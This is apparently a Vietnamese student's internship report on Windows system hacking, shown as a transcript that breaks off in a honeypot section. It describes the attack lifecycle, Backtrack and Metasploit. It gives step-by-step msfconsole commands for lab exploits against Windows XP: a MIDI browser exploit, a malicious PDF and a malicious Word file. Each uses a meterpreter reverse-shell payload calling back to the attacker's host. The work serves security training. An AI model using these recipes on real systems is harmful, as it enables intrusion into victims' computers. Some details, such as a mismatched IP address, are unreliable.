báo cáo thực tập athena cuối kỳ - nguyễn văn hưng

49
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO THỰC TẬP SYSTEM HACKING Giảng viên hướng dẫn: Võ Đỗ Thắng. Sinh viên thực hiện: Nguyễn Văn Hưng.

Upload: hungnguyen00

Post on 10-Aug-2015

35 views

Category:

Education


0 download

TRANSCRIPT

Page 1: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG

VÀ AN NINH MẠNG QUỐC TẾ ATHENA

BÁO CÁO THỰC TẬP

SYSTEM HACKING

Giảng viên hướng dẫn: Võ Đỗ Thắng.Sinh viên thực hiện: Nguyễn Văn Hưng.

TP. Hồ Chí Minh, tháng năm

Page 2: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

MỤC LỤC

PHẦN 1: GIỚI THIỆ

U1.1 System Hacking và Tình hình an ninh mạng Việt Nam.................................................................1

1.2 Các lỗ hổng thường khai thác trong hệ điều hành Windows..........................................................1

1.3 Quá trình tấn công vào một hệ thống.............................................................................................2

PHẦN 3: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG MẠNG LAN.............................................................................................................................................4

3.1 Hệ điều hành Backtrack 5 R3........................................................................................................4

3.2 Phần mềm Metasploit....................................................................................................................6

3.2.1 Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác..................................................................................................................................................7

3.2.2 Cấu hình Module exploit đã chọn:..........................................................................................7

3.2.3 Verify những options vừa cấu hình:.......................................................................................7

3.2.4 Lựa chọn target:......................................................................................................................7

3.2.5 Lựa chọn payload:..................................................................................................................7

2.2.6 Thực thi exploit:.....................................................................................................................7

3.3 Sơ đồ tổng quan hệ thống mạng LAN...........................................................................................8

3.4 Xâm nhập và khai thác Windows XP............................................................................................9

3.4.1 Lỗ hổng sử dụng: Ms12_004..................................................................................................9

3.4.2 Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2........................................................12

3.4.3 Lỗ hổng sử dụng: file WORD phiên bản word 2007............................................................14

PHẦN 4: XÂY DỰNG HONEYPOT KHAI THÁC XÂM NHẬP LỖ HỔNG TỪ XA QUA MẠNG INTERNET.......................................................................................................17

4.1. Máy Chủ Ảo (VPS).....................................................................................................................17

4.1.1. Định nghĩa...........................................................................................................................17

4.1.2. Đặc điểm về thông số VPS.................................................................................................17

4.2. Honeypot...................................................................................................................................18

4.3. Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa qua Internet..........................................18

4.4 Tấn công qua Internet..................................................................................................................20

SVTH: Nguyễn Văn Hưng Trang 2

Page 3: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

4.4.1 Các lỗi bảo mật:....................................................................................................................20

4.5 Phương pháp tấn công...............................................................................................................22

4.6. Phương pháp khắc phục lỗ hổng...............................................................................................24

PHẦN 5: TỔNG KẾT.............................................................................................................25

SVTH: Nguyễn Văn Hưng Trang 3

Page 4: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

LỜI CẢM ƠN KHOA CÔNG NGHỆ THÔNG TIN

TRƯỜNG ĐẠI HỌC CÔNG NGHIỆP THÀNH PHỐ HỒ CHÍ MINH

Em xin chân thành cảm ơn trường Đại Học Công Nghiệp TPHCM và khoa Công Nghệ Thông Tin đã tạo điều kiện cho em hoàn thành tốt đợt thực tập này. Trong đợt thực tập này đã cho em những kinh nghiệm quý báu. Những kinh nghiệm này sẽ giúp Em hoàn thiện hơn trong công việc và môi trường làm việc sau này.

Mặc dù em đã cố gắng hoàn thành báo cáo thực tập này với tất cả nổ lực của bản thân. Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn không thể tránh khỏi những thiếu sót nhất định. Em rất mong nhận được sự đóng góp, chia sẻ để em có thể làm tốt hơn nữa.

Một lần nữa em xin chân thành cảm ơn.

SVTH: Nguyễn Văn Hưng Trang 4

Page 5: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

LỜI CÁM ƠN TRUNG TÂM ATHENA Xin chân thành cảm ơn quý thầy cô của Trung tâm Athena, đặc biệc thầy Võ Đỗ Thắng đã hổ trợ cho tôi mọi điều kiện để có một môi trường thực tập tốt nhất. Xin cảm ơn tất cả quý thầy cô đã hết lòng quan tâm, dạy dỗ và trang bị cho tôi những kiến thức quý báu.

Đặc biệt, xin cảm ơn thầy Võ Đỗ Thắng – người đã trực tiếp hướng dẫn tôi trong quá trình triển khai và thực hiện đề tài này. Cảm ơn thầy đa tận tình hướng dẫn, động viên giúp đở trong quá trình thực hiện đề tài.

SVTH: Nguyễn Văn Hưng Trang 5

Page 6: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

ĐÁNH GIÁ CỦA GIẢNG VIÊN HƯỚNG DẪN

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

………………, ngày ……… tháng ……… năm 2015

Giảng viên hướng dẫn

Võ Đỗ Thắng

SVTH: Nguyễn Văn Hưng Trang 6

Page 7: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

ĐÁNH GIÁ CỦA GIẢNG VIÊN HƯỚNG DẪN

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

........................................................................................................................................................

……………, ngày ……… tháng ……… năm 2015

Giảng viên hướng dẫn

Phạm Viết Kha

SVTH: Nguyễn Văn Hưng Trang 7

Page 8: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

MỞ ĐẦUTheo thống kê, từ đầu năm 2013 đến nay, tại Việt Nam đã có 2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có khoảng 300 website bị tấn công. Ông Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên cứu phát triển của Bkav cho biết, các cơ quan doanh nghiệp bị tấn công gần như là đầy đủ, từ ít nghiêm trọng đến nghiêm trọng và rất nghiêm trọng (nhằm đánh cắp các tài liệu mật) và các mã độc này nhắm cả vào Bộ Công An, Bộ Quốc phòng, ngân hàng, các cơ quan đơn vị nghiên cứu, các doanh nghiệp…Đã có những chiến dịch tấn công, phát tán mã độc có chủ đích vào Việt Nam. Trong đó, bản thân các vụ tấn công trên mạng và các vụ xâm nhập hệ thống công nghệ thông tin là nhằm do thám, trục lợi, phá hoại dữ liệu, ăn cắp tài sản, cạnh tranh không lành mạnh và một số vụ mất an toàn thông tin số khác đang gia tăng ở mức báo động về số lượng, đa dạng về hình thức, tinh vi hơn về công nghệ.

Trước tình hình đó, song song việc ban hành chỉ thị 897/CT-TTg, Thủ Tướng chỉ đạo các Bộ, ngành, địa phương tăng cường giải pháp đảm bảo an toàn thông tin số. Thủ tướng Chính phủ cũng đã nêu rõ, trong thời gian qua, tình hình mất an toàn thông tin số ở nước ta diễn biến phức tạp, xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến việc ứng dụng công nghệ thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc phòng, an ninh.

Bài báo cáo này sẽ giới thiệu tổng quát về các phương pháp mà Hacker sử dụng để tấn công xâm nhập và khai thác vào các phiển bản hệ điều hành Windows, hệ điều hành phổ biến nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà Hacker sử dụng và đưa ra các giải pháp giúp cho mỗi người dùng được an toàn thông tin, bảo mật trong thời đại Internet ngày nay.

SVTH: Nguyễn Văn Hưng Trang 8

Page 9: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

PHẦN 1: GIỚI THIỆU1.1 System Hacking và Tình hình an ninh mạng Việt Nam

System hacking bao gồm những kỹ thuật lấy username, password dựa vào phần

mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ điều hành

Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những

log file hệ thống. Một khi đã xâm nhập vào hệ thống, Hacker có thể thực hiện mọi thứ

trên máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ

chức.

1.2 Các lỗ hổng thường khai thác trong hệ điều hành Windows

Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn dòng mã.

Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi trong đó có chứa

những lỗi lập trình, được biết đến với tên gọi lỗ hổng. Những lỗ hổng này được Hacker

sử dụng để xâm nhập vào hệ thống, cũng như được tác giả của các đọan mã độc dùng

để khởi động chương trình của họ một cách tự động trên máy tính của bạn.

Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều hành,

các Web Server hay các phần mềm khác, ... Và các hãng sản xuất luôn cập nhật các lỗ

hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các phiên bản

trước. Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp phiên bản cũ mà

mình đang sử dụng nếu không các Hacker sẽ lợi dụng điều này để tấn công vào hệ

thống. Thông thường, các forum của các hãng nổi tiếng luôn cập nhật các lỗ hổng bảo

mật và việc khai thác các lỗ hổng đó như thế nào thì tùy từng người.

Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới của

hệ điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn đang ngày

càng phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ điều hành của

Microsoft.

Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình để truy

cập vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật. Các chương trình độc

SVTH: Nguyễn Văn Hưng Trang 1

Page 10: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

hại được thiết kế đặc biệt để khai thác các lỗ hổng này, được gọi là kỹ thuật exploit,

đang ngày càng phổ biến nhanh chóng.

Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như HĐH

Windows, Internet Explorer, Windows Server, Microsoft Exchange và .NetFramework.

1.3 Quá trình tấn công vào một hệ thống

Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống. Mục tiêu

phía trước của chúng ta là một hệ thống máy tính. Các bước để tấn công, đánh sập nó,

có thể được liệt kê như hình vẽ bên cạnh. Nó gồm 6 công đoạn như sau:

(hình 1.1: Quá trình tấn công vào một hệ thống)

Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong hệ

thống. Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu

ích, chính xác hơn.

SVTH: Nguyễn Văn Hưng Trang 2

Page 11: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất. Bước này yêu cầu chúng

ta bẽ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách nào khác, mục

tiêu phải đạt tới là quyền truy cập vào hệ thống.

Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user

binh thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công.

Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị trước

malware, keylogger, rootkit…để chạy nó trên máy tính tấn công.

Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải

được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt.

Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin có liên

quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả

năng bạn bị phát hiện là kẻ đột nhập là rất cao.

Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá

trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật như

Footprinting, Social engineering, Enumeration, Google Hacking… đã được áp dụng

cho mục đích truy tìm thông tin.

Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình tấn

công hệ thống thật sự. Ta phải tiến hành những kỹ thuật khác nhau để làm sao vào

được trong hệ thống đó, thực hiện những việc mà mình mong muốn, như xóa dữ liệu,

chạy chương trình trojan, keylogger…

SVTH: Nguyễn Văn Hưng Trang 3

Page 12: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

PHẦN 3: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP

TRONG MẠNG LAN

3.1 Hệ điều hành Backtrack 5 R3

Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để

thử nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của

Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiên bản

hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 11.10.

Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác

nhau. Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M.

(www.slax.org)). Backtrack liên tục cập nhật các công cụ, drivers,... Hiện tại Backtrack

có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack là sự kết hợp giữa

2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và Auditor.

Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử

nghiệm thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack 5 có

thể được phân loại như sau:

Information gathering: loại này có chứa một số công cụ có thể được sử dụng để

có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail,

trang web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các thông

tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu.

Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra

các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và

cũng làm portscanning.

Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các

công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng

chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và

Simple Network Management Protocol (SNMP).

SVTH: Nguyễn Văn Hưng Trang 4

Page 13: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

Web application analysis: loại này chứa các công cụ có thể được sử dụng trong

theo dõi, giám sát các ứng dụng web.

Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng

tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này.

Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ

hổng tìm thấy trong các máy tính mục tiêu.

Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các

máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng

cao đặc quyền của chúng ta cho các đặc quyền cao nhất.

Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc

duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có

được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để

duy trì quyền truy cập.

Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ

trong thể loại này.

Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể

được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc

các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp

trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình

đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các

tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.

Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ

rối chương trình một hoặc tháo rời một tập tin thực thi.

Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtracklinux.org/downloads/

SVTH: Nguyễn Văn Hưng Trang 5

Page 14: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

3.2 Phần mềm Metasploit

Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ

hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống phát hiện

tấn công mạng. Metasploit Framework là một môi trường dùng để kiểm tra, tấn công

và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối

tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit

có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Chúng ta có thể

download chương trình tại www.metasploit.com.

Metasploit hỗ trợ nhiều giao diện với người dùng:

Console interface: dùng lệnh msfconsole. Msfconsole interface sử dụng các

dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn.

Web interface: dùng msfweb, giao tiếp với người dùng thông qua giao diện

Web.

Command line interface: dùng msfcli.

Metasploit Enviroment:

Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những

options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module

exploits.

Temporary Enviroment: Được thực thi thông qua 2 câu lệnh set và unset,

enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng

đến các module exploit khác Chúng có thể lưu lại enviroment mình đã cấu hình thông

qua lệnh save. Môi trường đó sẽ được lưu trong ./msf/config và sẽ được load trở lại khi

user interface được thực hiện.

SVTH: Nguyễn Văn Hưng Trang 6

Page 15: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

3.2.1 Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có

hỗ trợ để khai thác

Show exploits: xem các module exploit mà framework có hỗ trợ.

Use exploit_name: chọn module exploit.

Info exploit_name: xem thông tin về module exploit.

Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các modul trên

www.metasploit.com hoặc qua lệnh msfupdate hoặc svnupdat/opt/metasploit/msf3/.

3.2.2 Cấu hình Module exploit đã chọn:

show options: Xác định những options nào cần cấu hình.

set: cấu hình cho những option của module đó.

Một vài module còn có những advanced options, chúng ta có thể xem bằng cách

gõ dòng lệnh show advanceds.

3.2.3 Verify những options vừa cấu hình:

check: kiểm tra xem những option đã được set chính xác chưa.

3.2.4 Lựa chọn target:

show targets: những target được cung cấp bởi module đó.

set: xác định target nào.

3.2.5 Lựa chọn payload:

show payloads: liệt kê ra những payload của module exploit hiện tại.

info payload_name: xem thông tin chi tiết về payload đó.

set payload payload_name: xác định payload module name. Sau khi lựa chọn

payload nào, dùng lệnh show options để xem những options của payload đó.

show advanced: xem những advanced options của payload đó.

2.2.6 Thực thi exploit:

exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho

chúng ta những thông tin về hệ thống được khai thác.

SVTH: Nguyễn Văn Hưng Trang 7

Page 16: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

3.3 Sơ đồ tổng quan hệ thống mạng LAN

(Hình 2.1: Sơ đồ tổng quan hệ thống mạng LAN)

Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng

cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính

trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình là chia sẻ tập tin,

máy in, máy quét và một số thiết bị khác. Khi một máy tính ở trong mạng LAN, nó có

thể sử dụng các chương trình, phần mềm quét hệ thống mạng để biết được địa chỉ IP

các host có trong mạng.

Nmap (Network Mapper) là một tiện ích nguồn mở miễn phí cho phát hiện

mạng và kiểm toán an ninh. Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap) được

cài đặt sẵn trong BackTrack, sử dụng các gói tin IP giúp xác định host nào có sẵn trên

mạng, các dịch vụ (tên ứng dụng và phiên bản) mà host đó đang cung cấp, hệ điều hành

gì (và các phiên bản hệ điều hành) mà họ đang chạy, loại bộ lọc gói tin hoặc tường lửa

nào đang sử dụng, và nhiều đặc điểm khác. Nmap chạy được trên tất cả các hệ điều

hành, và các gói nhị phân chính thức có sẵn cho Linux, Windows, và Mac OSX.

SVTH: Nguyễn Văn Hưng Trang 8

Page 17: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công cụ

quét lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai thác

truy cập vào hệ thống. Một trong số các công cụ quét lỗi này là Nessus, download tại

địa chỉ http://www.nessus.org/.

Một khi đã xâm nhập thành công và chiếm được toàn quyền điều khiển hệ

thống, Hacker có thể thực hiện mọi việc trên máy nạn nhân như down/upload files,

thay đổi cấu trúc hệ thống, thực thi chương trình, đánh cắp mật khẩu, cài trojan/

backdoor, …

3.4 Xâm nhập và khai thác Windows XP

3.4.1 Lỗ hổng sử dụng: Ms12_004

Khởi động msfconsole tử cửa sổ terminal của BackTrack

Khai báo lỗ hổng sử dụng và thiết đặt options:

o Search ms12_004

o use exploit/windows/browser/ms12_004_midi

o show options

o set SRVHOST 192.168.159.128

o set PAYLOAD windows/meterpreter/reverse_tcp

o set LHOST 192.168.159.128

o exploit

SVTH: Nguyễn Văn Hưng Trang 9

Page 18: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

(hình 2.2: Lỗ hổng sử dụng: Ms12_004)

BackTrack sẽ tạo ra một link chứa mã độc (http://192.168.159.128:4444). Chỉ

cần nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang máy

nạn nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó.

(hình 2.3: Lỗ hổng sử dụng: Ms12_004)

SVTH: Nguyễn Văn Hưng Trang 10

Page 19: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

Tiến hành khai thác máy nạn nhân có IP: 192.168.159.129 port 1078.

sessions

sessions –i 1

getuid

sysinfo

(hình 2.4: Lỗ hổng sử dụng: Ms12_004)

Hacked: khai thác thành công lỗi ms12_004 trên winXP SP2

SVTH: Nguyễn Văn Hưng Trang 11

Page 20: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

3.4.2 Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2

Khởi động msfconsole tử cửa sổ terminal của BackTrack.

Khai báo lỗ hổng sử dụng và thiết đặt options:

o Search nojs

o use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

o show options

o set FILENAME test.pdf (đây là tên do mình tự đặt với cú pháp *.pdf)

o set PAYLOAD windows/meterpreter/reverse_tcp

o set LHOST 192.168.159.128

o set LPORT 4444

o exploit

(hình 2.5: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2)

- Sau khi tiến hành xong các bước trên, backtrack sẽ tạo 1 file pdf có chứa mã

độc, file sẽ được lưu tại root./msf4/test.pdf

- Tiếp tục thực hiện các bước sau:

SVTH: Nguyễn Văn Hưng Trang 12

Page 21: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

Use multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.159.128

exploit

(hình 2.6: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2)

Tới đây chúng ta bắt đầu gửi file pdf vừa tạo cho máy nạn nhân, khi nạn nhân

mở file backtrack sẽ gửi mã độc và chiếm được quyền sử dụng máy nạn nhân.

SVTH: Nguyễn Văn Hưng Trang 13

Page 22: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

(hình 2.7: Lỗ hổng sử dụng: file PDF phiên bản adobe reader 9.2)

- Tới đây chúng ta đã chiếm được quyền sử dụng của máy nạn nhân.

3.4.3 Lỗ hổng sử dụng: file WORD phiên bản word 2007

Khởi động msfconsole tử cửa sổ terminal của BackTrack.

Khai báo lỗ hổng sử dụng và thiết đặt options:

o Search ms12_027

o use exploit/windows/fileformat/ms12_027_mscomctl_bof

o show options

o set FILENAME test.doc (đây là tên do mình tự đặt với cú pháp *.pdf)

o set PAYLOAD windows/meterpreter/reverse_tcp

o set LHOST 192.168.159.128

o exploit

SVTH: Nguyễn Văn Hưng Trang 14

Page 23: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

(hình 2.8: Lỗ hổng sử dụng: file WORD phiên bản word 2007)

- Sau khi tiến hành xong các bước trên, backtrack sẽ tạo 1 file word có chứa mã

độc, file sẽ được lưu tại root./msf4/test.doc

- Tiếp tục thực hiện các bước sau:

Use exploit/multi/handler

Set payload /windows/meterpreter/reverse_tcp

Set lhost 192.168.158.128

Exploit

SVTH: Nguyễn Văn Hưng Trang 15

Page 24: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

(hình 2.9: Lỗ hổng sử dụng: file WORD phiên bản word 2007)

- Sau khi thực hiện các bước trên, chúng ta bắt đầu gửi file word qua cho máy nạn

nhân, khi nạn nhân mở file word backtrack sẽ tự động gửi mã độc qua và chúng

ta có thể chiếm quyền sử dụng máy nạn nhân

(hình 2.10: Lỗ hổng sử dụng: file WORD phiên bản word 2007)

SVTH: Nguyễn Văn Hưng Trang 16

Page 25: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

PHẦN 4: XÂY DỰNG HONEYPOT KHAI THÁC XÂM NHẬP LỖ HỔNG

TỪ XA QUA MẠNG INTERNET

4.1. Máy Chủ Ảo (VPS)

4.1.1. Định nghĩa

Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật

lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể

có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ

bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều.

Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn

quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế

100% khả năng bị hack local.

Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung

tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh

hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản trên

VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường.

VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng,

nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người

sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,….

4.1.2. Đặc điểm về thông số VPS

Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng,

dung lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP và hệ điều hành riêng.

Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.

Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng

khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình

duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao…

SVTH: Nguyễn Văn Hưng Trang 17

Page 26: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà

không cần phải khởi động lại hệ thống

Có thể cài lại hệ điều hành với thời gian từ 5-10 phút. Có tính chất quản lý nội bộ riêng

của doanh nghiệp. Không tốn chi phí mua thiết bị, chi phí bảo dưỡng.

Có thể quản trị từ xa, cài đặt các ứng dụng quản trị doanh nghiệp, CRM, quản lý khách

hàng, bán hàng trực tuyến...

4.2. Honeypot

Honeypot là một hệ thống tài nguyên thông tin được xây dựng với mục đích giả

dạng đánh lừa những kẻ sử dụng và xâm nhập không hợp pháp, thu hút sự chú ý của

chúng, ngăn không cho chúng tiếp xúc với hệ thống thật. Hệ thống tài nguyên thông tin

có nghĩa là Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là Mail

Server, Domain Name Server, Web Server… Honeypot sẽ trực tiếp tương tác với tin

tặc và tìm cách khai thác thông tin về tin tặc như hình thức tấn công, công cụ tấn công

hay cách thức tiến hành thay vì bị tấn công. Với mục tiêu xây dựng Honeypot để xâm

nhập vào lỗ hổng hệ thống máy tính qua Internet, Hacker có thể sử dụng Máy chủ ảo

(VPS) và cài đặt Honeypot để giả dạng là một Web server bình thường, từ đó đánh lừa

máy nạn nhân khi một máy tính bất kỳ có kết nối Internet truy cập vào địa chỉ mà VPS

cung cấp.

4.3. Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa qua Internet

(hình 3.1: sơ đồ tổng quan sử dụng Honepot)

SVTH: Nguyễn Văn Hưng Trang 18

Page 27: Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

Báo cáo thực tập

Chúng ta – đóng vài trò là Attacker, cần chuẩn bị:

